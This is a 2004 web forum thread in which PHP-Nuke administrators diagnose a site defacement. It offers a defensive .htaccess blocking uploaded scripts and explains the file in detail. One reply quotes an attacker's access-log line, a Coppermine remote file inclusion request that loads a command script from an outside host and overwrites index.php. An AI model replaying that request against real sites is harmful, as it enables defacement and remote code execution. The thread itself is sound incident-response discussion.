You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 168 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - [Site hacked] index.php was being replaced/edited [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
ring_c
Nuke Soldier
Nuke Soldier


Joined: Dec 15, 2003
Posts: 27


PostPosted: Tue Jun 01, 2004 5:14 pm Reply with quoteBack to top

for the last 24 hours, my site was hacked twice with the same method.
Somehow, someone manage to alter/replace my index.php.

Today they left an index.php with these: "Rebellious Fingers - rebellious@end-war.com"

I'm using phpnuke v6.7.
Is this a known issue?
Is there a solution?

I also have Fortress running, and it didn't seem to bother them, nor did I get an email from it.

Any help will do. please!
Find all posts by ring_cView user's profileSend private messageVisit poster's website
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806


PostPosted: Tue Jun 01, 2004 5:30 pm Reply with quoteBack to top

If you are using modules/addons which has file upload feature, that could be the cause. Some XSS methods can also do the trick which let your server creating a file then rename it as php extension.

The solution; update any modules/addons/scripts that allow your visitors to upload a file to your site. If your server running under Linux (or some *nix system that support ext2/ext3 file system), and you have access to the server shell, you can use chattr shell command to change PHP-Nuke file attributes.

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
ring_c
Nuke Soldier
Nuke Soldier


Joined: Dec 15, 2003
Posts: 27


PostPosted: Tue Jun 01, 2004 5:42 pm Reply with quoteBack to top

madman wrote:
If you are using modules/addons which has file upload feature, that could be the cause. Some XSS methods can also do the trick which let your server creating a file then rename it as php extension.

I have the attach_mod in my phpbb. could that be the problem?
Otherwise, I have the "upload files" in my admin panel too. I'll remove this one, as I'm not using it anyway...

madman wrote:
If your server running under Linux (or some *nix system that support ext2/ext3 file system), and you have access to the server shell, you can use chattr shell command to change PHP-Nuke file attributes.

Now, this is a Chinese for me... Sad
Find all posts by ring_cView user's profileSend private messageVisit poster's website
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806


PostPosted: Tue Jun 01, 2004 6:00 pm Reply with quoteBack to top

ring_c wrote:
I have the attach_mod in my phpbb. could that be the problem?


Try updating to attach mod 2.3.9 and enable scripting code about security in download.php (part of attach mod file). In addition, you can put .htaccess file (if your server running Apache, with full override to mod_access and mod_rewrite) into attach mod upload directory (default is "/files/"). Here the content of .htaccess file:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>

<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


Replace YOURDOMAIN.FOO.BAR above with your actual domain (you don't have to supply www prefix).

ring_c wrote:
Otherwise, I have the "upload files" in my admin panel too. I'll remove this one, as I'm not using it anyway...


Good idea.

ring_c wrote:
Now, this is a Chinese for me... Sad


Question Rolling Eyes

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
ring_c
Nuke Soldier
Nuke Soldier


Joined: Dec 15, 2003
Posts: 27


PostPosted: Tue Jun 01, 2004 6:11 pm Reply with quoteBack to top

madman wrote:
Try updating to attach mod 2.3.9 and enable scripting code about security in download.php (part of attach mod file).


I am using 2.3.9.
I couldn't quite understand the second part of your sentence. where do I enable scripting code? also couldn't find any download.php under attach_mod.

madman wrote:
In addition, you can put .htaccess file

Thanks. done that.
Find all posts by ring_cView user's profileSend private messageVisit poster's website
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806


PostPosted: Tue Jun 01, 2004 6:29 pm Reply with quoteBack to top

ring_c wrote:
I couldn't quite understand the second part of your sentence. where do I enable scripting code? also couldn't find any download.php under attach_mod.


If you running stand-alone phpbb, download.php is in your phpbb root directory. If you running bb2nuke ported mod (PHP-Nuke standard forum module), it located in modules/Forums/ directory. By default, security script codes are commented in this file. Read further on comments at this download.php file.

ring_c wrote:
Thanks. done that.


Cool

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
zanis
Lieutenant
Lieutenant


Joined: Aug 21, 2003
Posts: 213


PostPosted: Wed Jun 02, 2004 12:42 am Reply with quoteBack to top

madman wrote:
In addition, you can put .htaccess file (if your server running Apache, with full override to mod_access and mod_rewrite) into attach mod upload directory (default is "/files/"). Here the content of .htaccess file:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>

<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


Replace YOURDOMAIN.FOO.BAR above with your actual domain (you don't have to supply www prefix).



Hello madman!

I was wondering if you could help me by explaining how this works and is it required if you allow your members to upload their own avatars for the forum?

Cheers

Zanis
Find all posts by zanisView user's profileSend private message
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806


PostPosted: Wed Jun 02, 2004 8:02 am Reply with quoteBack to top

zanis wrote:
I was wondering if you could help me by explaining how this works


that .htaccess file is the last chance to prevent someone uploading files and execute them. We take a look all those modifiers one by one:

Code:
<Files .htaccess>
  Order Allow,Deny
  Deny from all
</Files>


This is to protect .htaccess file itself. Usually .htaccess must be stored with 644 CHMOD attributes, but sometimes we forgot to do so, then this identifier will ensure .htaccess file cannot be altered by any way from outside (however, it still alterable from ftp or other server-side file management).

Code:
<FilesMatch "\.(p?html?|inc|php.?|pl|js|cgi|asp|conf)$">
  Order Allow,Deny
  Deny from all
</FilesMatch>


This identifier will prevent some uploadable files executed from outside. In the declaration above, I restrict .htm, .html, phtml, .phtm, .inc, .php, .php3, .php4, .pl, .js, .cgi, .asp, and .conf to be executed (if they exists). If someone can passing such files from file upload checking in script, they still won't execute them due of server/apache restriction.

Code:
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://(www\.)?YOURDOMAIN.FOO.BAR/.*$ [NC]
RewriteRule .*$ - [F]


This is prevent hotlinking. This ensure all files stored in upload directory must be processed from inside your domain. Please note the originate request is taken from referer header. This mean, people using firewall/proxy which stripping referral header will got the same restriction.

Quote:
is it required if you allow your members to upload their own avatars for the forum?


You can put that .htaccess in avatar upload directory as well. Be sure there's no subdirs containing your scripting files below the upload directory. But for security reason (as what this forum is for), in my opinion do not let users to upload their avatar to your site. Provide only local/pre-existing avatars or let them using remote avatar (but still keeping to check their extension and valid image checking, however this is already done in phpbb).

Sorry if this is sounds too complicated. I can't explain it in simple words maybe because we talk about technical topic. Perhaps someone can explain this better than mine. Smile But honestly, playing with .htaccess isn't ever simple. This is a Swiss Army's knife of Apache, similar to Regedit in Windows. You do this in wrong way, you'll screw entire system.

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
Stephen2417
Major
Major


Joined: Dec 26, 2003
Posts: 1135

Location: Bristolville, OH (US)

PostPosted: Wed Jun 02, 2004 9:01 am Reply with quoteBack to top

Alright I said I was leaving once but I just cant sit here and watch you guys guess..

Plain and simple its coppermine.
Find all posts by Stephen2417View user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
burnwave
Sergeant
Sergeant


Joined: Sep 13, 2003
Posts: 107

Location: Maryland, USA

PostPosted: Wed Jun 02, 2004 9:33 am Reply with quoteBack to top

Where is his coppermine module on his site? All I am seeing is 4nAlbum. Does that module have public upload features? If so, that could be the case.

_________________
Wow. Just wow.
Find all posts by burnwaveView user's profileSend private messageVisit poster's websiteAIM AddressYahoo MessengerMSN MessengerICQ Number
SaraHol
Corporal
Corporal


Joined: Aug 29, 2003
Posts: 71


PostPosted: Thu Jun 03, 2004 8:15 am Reply with quoteBack to top

That's a great post Madman. I certainly learned some stuff from it. Thanks.
Find all posts by SaraHolView user's profileSend private message
thewizard
Sergeant
Sergeant


Joined: Sep 01, 2003
Posts: 134

Location: Germany

PostPosted: Thu Jun 03, 2004 12:10 pm Reply with quoteBack to top

well havent been here for a long time too. Wink.

so look thats they way its done. the vulnerable part is coppermine.
got the guy and one of his dsl ips from brazil.

200.96.250.204 - - [01/Jun/2004:20:30:53 +0200] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://magnific.webcindario.com/cmd.txt?&cmd=cd%20/here the string for your home directory/;mv%20you.txt%20index.php HTTP/1.1"

well maybe someone can have a closer look at this cmd.txt mentioned in the string. if its been deleted meanwhile, i took a copy Rolling Eyes so just pm me if someone wants it

_________________

Rather must you Become, and Become, and Become, until Hackers respect thy Power, and other Wizards hail thee as a Brother or Sister in Wisdom, and you wake up and realize that the Mantle hath lain unknown upon thy Shoulders since you knew not when.

Last edited by thewizard on Thu Jun 03, 2004 12:24 pm; edited 1 time in total
Find all posts by thewizardView user's profileSend private messageVisit poster's website
Stephen2417
Major
Major


Joined: Dec 26, 2003
Posts: 1135

Location: Bristolville, OH (US)

PostPosted: Thu Jun 03, 2004 12:22 pm Reply with quoteBack to top

Great thanks for posting how to hack a site with coppermine... suggest you remove that.
Find all posts by Stephen2417View user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
thewizard
Sergeant
Sergeant


Joined: Sep 01, 2003
Posts: 134

Location: Germany

PostPosted: Thu Jun 03, 2004 12:27 pm Reply with quoteBack to top

no matter.
Exclamation Exclamation think its better the guys out there disable their coppermine, until its secured. seems its only ONE way to hack the module

_________________

Rather must you Become, and Become, and Become, until Hackers respect thy Power, and other Wizards hail thee as a Brother or Sister in Wisdom, and you wake up and realize that the Mantle hath lain unknown upon thy Shoulders since you knew not when.
Find all posts by thewizardView user's profileSend private messageVisit poster's website
Stephen2417
Major
Major


Joined: Dec 26, 2003
Posts: 1135

Location: Bristolville, OH (US)

PostPosted: Thu Jun 03, 2004 12:33 pm Reply with quoteBack to top

Well if your directly accessing the file i dont think that would matter you know..

All you have to do is get hte latest version and your done.
Find all posts by Stephen2417View user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.093 Seconds - 523 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::